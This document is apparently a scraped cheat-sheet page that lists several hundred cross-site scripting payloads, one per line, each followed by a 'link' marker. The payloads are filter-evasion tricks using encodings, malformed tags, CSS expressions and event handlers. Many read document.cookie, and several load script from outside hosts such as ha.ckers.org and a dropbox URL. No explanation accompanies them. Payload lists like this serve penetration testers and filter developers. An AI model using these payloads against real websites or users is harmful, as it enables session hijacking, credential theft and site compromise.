<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="> |
link |
<script>({0:#0=alert/#0#/#0#(123)})</script> |
link |
<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(123)}),x</script> |
link |
<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script> |
link |
<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script> |
link |
<svg xmlns="#"><script>alert(1)</script></svg> |
link |
<svg onload="javascript:alert(123)" xmlns="#"></svg> |
link |
<iframe xmlns="#" src="javascript:alert(1)"></iframe> |
link |
+ADw-script+AD4-alert(document.location)+ADw-/script+AD4- |
link |
%2BADw-script+AD4-alert(document.location)%2BADw-/script%2BAD4- |
link |
+ACIAPgA8-script+AD4-alert(document.location)+ADw-/script+AD4APAAi- |
link |
%2BACIAPgA8-script%2BAD4-alert%28document.location%29%2BADw-%2Fscript%2BAD4APAAi- |
link |
%253cscript%253ealert(document.cookie)%253c/script%253e |
link |
“><s”%2b”cript>alert(document.cookie)</script> |
link |
“><ScRiPt>alert(document.cookie)</script> |
link |
“><<script>alert(document.cookie);//<</script> |
link |
foo<script>alert(document.cookie)</script> |
link |
<scr<script>ipt>alert(document.cookie)</scr</script>ipt> |
link |
‘; alert(document.cookie); var foo=’ |
link |
foo\’; alert(document.cookie);//’; |
link |
</script><script >alert(document.cookie)</script> |
link |
<img src=asdf onerror=alert(document.cookie)> |
link |
<BODY ONLOAD=alert(’XSS’)> |
link |
<script>alert(1)</script> |
link |
"><script>alert(String.fromCharCode(66, 108, 65, 99, 75, 73, 99, 101))</script> |
link |
<video src=1 onerror=alert(1)> |
link |
<audio src=1 onerror=alert(1)> |
link |
'';!--"<XSS>=&{()} |
link |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" |
link |
<script/src=data:,alert()> |
link |
<marquee/onstart=alert()> |
link |
<video/poster/onerror=alert()> |
link |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> |
link |
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> |
link |
<a onmouseover="alert(document.cookie)">xxs link</a> |
link |
<a onmouseover=alert(document.cookie)>xxs link</a> |
link |
<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> |
link |
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> |
link |
<IMG SRC=# onmouseover="alert('xxs')"> |
link |
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img> |
link |
'XSS')> |
link |
#0000108ert('XSS')> |
link |
<IMG SRC="jav	ascript:alert('XSS');"> |
link |
<IMG SRC="jav
ascript:alert('XSS');"> |
link |
<IMG SRC="jav
ascript:alert('XSS');"> |
link |
<IMG SRC="  javascript:alert('XSS');"> |
link |
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")> |
link |
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B > |
link |
<SCRIPT SRC=//ha.ckers.org/.j> |
link |
<iframe src=http://ha.ckers.org/scriptlet.html < |
link |
\";alert('XSS');// |
link |
</script><script>alert('XSS');</script> |
link |
</TITLE><SCRIPT>alert("XSS");</SCRIPT> |
link |
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> |
link |
<BODY BACKGROUND="javascript:alert('XSS')"> |
link |
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br> |
link |
<IMG SRC="livescript:[code]"> |
link |
<BODY ONLOAD=alert('XSS')> |
link |
<BGSOUND SRC="javascript:alert('XSS');"> |
link |
<BR SIZE="&{alert('XSS')}"> |
link |
<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> |
link |
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> |
link |
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> |
link |
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> |
link |
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> |
link |
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> |
link |
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> |
link |
xss:ex/*XSS*//*/*/pression(alert("XSS"))'> |
link |
<STYLE TYPE="text/javascript">alert('XSS');</STYLE> |
link |
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> |
link |
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> |
link |
<XSS STYLE="xss:expression(alert('XSS'))"> |
link |
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> |
link |
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> |
link |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> |
link |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> |
link |
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> |
link |
<TABLE BACKGROUND="javascript:alert('XSS')"> |
link |
<TABLE><TD BACKGROUND="javascript:alert('XSS')"> |
link |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
link |
<DIV STYLE="background-image: url(javascript:alert('XSS'))"> |
link |
<DIV STYLE="width: expression(alert('XSS'));"> |
link |
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]--> |
link |
<BASE HREF="javascript:alert('XSS');//"> |
link |
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> |
link |
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> |
link |
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> |
link |
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"> |
link |
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT a=`>`SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> |
link |
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-" |
link |
veris-->group<svg/onload=alert(/XSS/)// |
link |
element[attribute='<img src=x onerror=alert('XSS');> |
link |
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ] |
link |
%22;alert%28%27RVRSH3LL_XSS%29// |
link |
javascript:alert%281%29; |
link |
<w contenteditable id=x onfocus=alert()> |
link |
alert;pg("XSS") |
link |
<svg/onload=%26%23097lert%26lpar;1337)> |
link |
<script>for((i)in(self))eval(i)(1)</script> |
link |
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt> |
link |
<sCR<script>iPt>alert(1)</SCr</script>IPt> |
link |
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a> |
link |
%253Cscript%253Ealert('XSS')%253C%252Fscript%253E |
link |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> |
link |
<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> |
link |
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; |
link |
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> |
link |
<INPUT TYPE="BUTTON" action="alert('XSS')"/> |
link |
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> |
link |
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> |
link |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> |
link |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> |
link |
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> |
link |
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF |
link |
g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 |
link |
<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> |
link |
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> |
link |
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> |
link |
<iframe src=http://xss.rocks/scriptlet.html < |
link |
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> |
link |
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> |
link |
<iframe src="	javascript:prompt(1)	"> |
link |
<svg><style>{font-family:'<iframe/onload=confirm(1)>' |
link |
<input/onmouseover="javaSCRIPT:confirm(1)" |
link |
<sVg><scRipt >alert(1) {Opera} |
link |
<img/src=`` onerror=this.onerror=confirm(1) |
link |
<form><isindex formaction="javascript:confirm(1)" |
link |
<img src=``
 onerror=alert(1)
 |
link |
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> |
link |
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? |
link |
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> |
link |
<script /**/>/**/alert(1)/**/</script /**/ |
link |
"><h1/onmouseover='\u0061lert(1)'> |
link |
<iframe/src="data:text/html,<svg onload=alert(1)>"> |
link |
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> |
link |
<svg><script xlink:href=data:,window.open('https://www.google.com/') </script |
link |
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} |
link |
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> |
link |
<iframe src=javascript:alert(document.location)> |
link |
<img/	  src= ~onerror=prompt(1)> |
link |
<form><iframe 	  src="javascript:alert(1)" 	;> |
link |
http://www.google<script .com>alert(document.location)</script |
link |
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a |
link |
<img/src=@  onerror = prompt('1') |
link |
<style/onload=prompt('XSS') |
link |
<script ^__^>alert(String.fromCharCode(49))</script ^__^ |
link |
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( |
link |
�</form><input type="date" onfocus="alert(1)"> |
link |
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> |
link |
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ |
link |
<iframe srcdoc='<body onload=prompt(1)>'> |
link |
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> |
link |
<style/onload=<!--	> alert (1)> |
link |
<///style///><span %2F onmousemove='alert(1)'>SPAN |
link |
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) |
link |
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' |
link |
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} |
link |
<marquee onstart='javascript:alert(1)'>^__^ |
link |
<div/style="width:expression(confirm(1))">X</div> {IE7} |
link |
<iframe// src=javaSCRIPT:alert(1) |
link |
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// |
link |
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> |
link |
//|\\ <script //|\\ src='<https://dl.dropbox.com/u/13018058/js.js'>> //|\\ </script //|\\ |
link |
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> |
link |
<a/href="javascript: javascript:prompt(1)"><input type="X"> |
link |
</plaintext\></|\><plaintext/onmouseover=prompt(1) |
link |
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} |
link |
<a href="javascript:\u0061le%72t(1)"><button> |
link |
<div onmouseover='alert(1)'>DIV</div> |
link |
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> |
link |
<a href="jAvAsCrIpT:alert(1)">X</a> |
link |
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> |
link |
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> |
link |
<var onmouseover="prompt(1)">On Mouse Over</var> |
link |
<a href=javascript:alert(document.cookie)>Click Here</a> |
link |
<img src="/" =_=" title="onerror='prompt(1)'"> |
link |
<%<!--'%><script>alert(1);</script --> |
link |
<script src="data:text/javascript,alert(1)"></script> |
link |
<svg/onload=alert(1) |
link |
<input value=<><iframe/src=javascript:confirm(1) |
link |
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> |
link |
http://www.<script>alert(1)</script .com |
link |
<svg><script ?>alert(1) |
link |
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> |
link |
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> |
link |
<math><a xlink:href="//jsfiddle.net/t846h/">click |
link |
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> |
link |
<svg contentScriptType=text/vbs><script>MsgBox+1 |
link |
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a |
link |
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> |
link |
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F |
link |
<object data=javascript:\u0061le%72t(1)> |
link |
<script itworksinallbrowsers>/*<script* */alert(1)</script |
link |
<img src ?itworksonchrome?\/onerror = alert(1) |
link |
<svg><script>//
confirm(1);</script </svg> |
link |
<svg><script onlypossibleinopera:-)> alert(1) |
link |
<div/onmouseover='alert(1)'> style="x:"> |
link |
"><img src=x onerror=window.open('https://www.google.com/');> |
link |
<form><button formaction=javascript:alert(1)>CLICKME |
link |
<math><a xlink:href="//jsfiddle.net/t846h/">click |
link |
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> |
link |
<script\x20type="text/javascript">javascript:alert(1);</script> |
link |
<script\x3Etype="text/javascript">javascript:alert(1);</script> |
link |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> |
link |
<script\x09type="text/javascript">javascript:alert(1);</script> |
link |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> |
link |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> |
link |
<script\x0Atype="text/javascript">javascript:alert(1);</script> |
link |
'`"><\x3Cscript>javascript:alert(1)</script> |
link |
'`"><\x00script>javascript:alert(1)</script> |
link |
<img src=1 href=1 onerror="javascript:alert(1)"></img> |
link |
<audio src=1 href=1 onerror="javascript:alert(1)"></audio> |
link |
<video src=1 href=1 onerror="javascript:alert(1)"></video> |
link |
<body src=1 href=1 onerror="javascript:alert(1)"></body> |
link |
<image src=1 href=1 onerror="javascript:alert(1)"></image> |
link |
<object src=1 href=1 onerror="javascript:alert(1)"></object> |
link |
<script src=1 href=1 onerror="javascript:alert(1)"></script> |
link |
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> |
link |
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> |
link |
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> |
link |
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> |
link |
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> |
link |
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> |
link |
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> |
link |
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> |
link |
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> |
link |
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> |
link |
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> |
link |
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> |
link |
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> |
link |
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> |
link |
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> |
link |
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> |
link |
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> |
link |
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> |
link |
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> |
link |
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> |
link |
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> |
link |
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> |
link |
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> |
link |
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> |
link |
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> |
link |
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> |
link |
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> |
link |
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> |
link |
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> |
link |
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> |
link |
<object onError object onError="javascript:javascript:alert(1)"></object onError> |
link |
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> |
link |
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> |
link |
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> |
link |
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> |
link |
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> |
link |
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> |
link |
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> |
link |
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> |
link |
<body onload body onload="javascript:javascript:alert(1)"></body onload> |
link |
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> |
link |
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> |
link |
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> |
link |
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> |
link |
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> |
link |
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> |
link |
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> |
link |
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> |
link |
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> |
link |
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> |
link |
\x3Cscript>javascript:alert(1)</script> |
link |
'"`><script>/**\x2Fjavascript:alert(1)// */</script> |
link |
<script>javascript:alert(1)</script\x0D |
link |
<script>javascript:alert(1)</script\x0A |
link |
<script>javascript:alert(1)</script\x0B |
link |
<script charset="\x22>javascript:alert(1)</script> |
link |
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)>` --> |
link |
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)>` --> |
link |
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)>` --> |
link |
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)>` --> |
link |
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)>` --> |
link |
"'><img src='#\x27 onerror=javascript:alert(1)> |
link |
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> |
link |
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> |
link |
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> |
link |
<script>/* *\x2A/javascript:alert(1)// */</script> |
link |
<script>/* *\x00/javascript:alert(1)// */</script> |
link |
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)/`/></style> |
link |
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)/`/></style> |
link |
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)/`/></style> |
link |
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)/`/></style> |
link |
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)/`/></style> |
link |
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF |
link |
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF |
link |
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> |
link |
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> |
link |
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> |
link |
'`"><\x3Cscript>javascript:alert(1)</script> |
link |
'`"><\x00script>javascript:alert(1)</script> |
link |
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> |
link |
"'`><\x00img src=xxx:x onerror=javascript:alert(1)> |
link |
<script src="data:text/plain\x2Cjavascript:alert(1)"></script> |
link |
<script src="data:\xD4\x8F,javascript:alert(1)"></script> |
link |
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> |
link |
<script src="data:\xCB\x8F,javascript:alert(1)"></script> |
link |
<script\x20type="text/javascript">javascript:alert(1);</script> |
link |
<script\x3Etype="text/javascript">javascript:alert(1);</script> |
link |
<script\x0Dtype="text/javascript">javascript:alert(1);</script> |
link |
<script\x09type="text/javascript">javascript:alert(1);</script> |
link |
<script\x0Ctype="text/javascript">javascript:alert(1);</script> |
link |
<script\x2Ftype="text/javascript">javascript:alert(1);</script> |
link |
<script\x0Atype="text/javascript">javascript:alert(1);</script> |
link |
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF |
link |
ABC<div style="x:expression\x00(javascript:alert(1)">DEF |
link |
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF |
link |
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF |
link |
ABC<div style="x:\x09expression(javascript:alert(1)">DEF |
link |
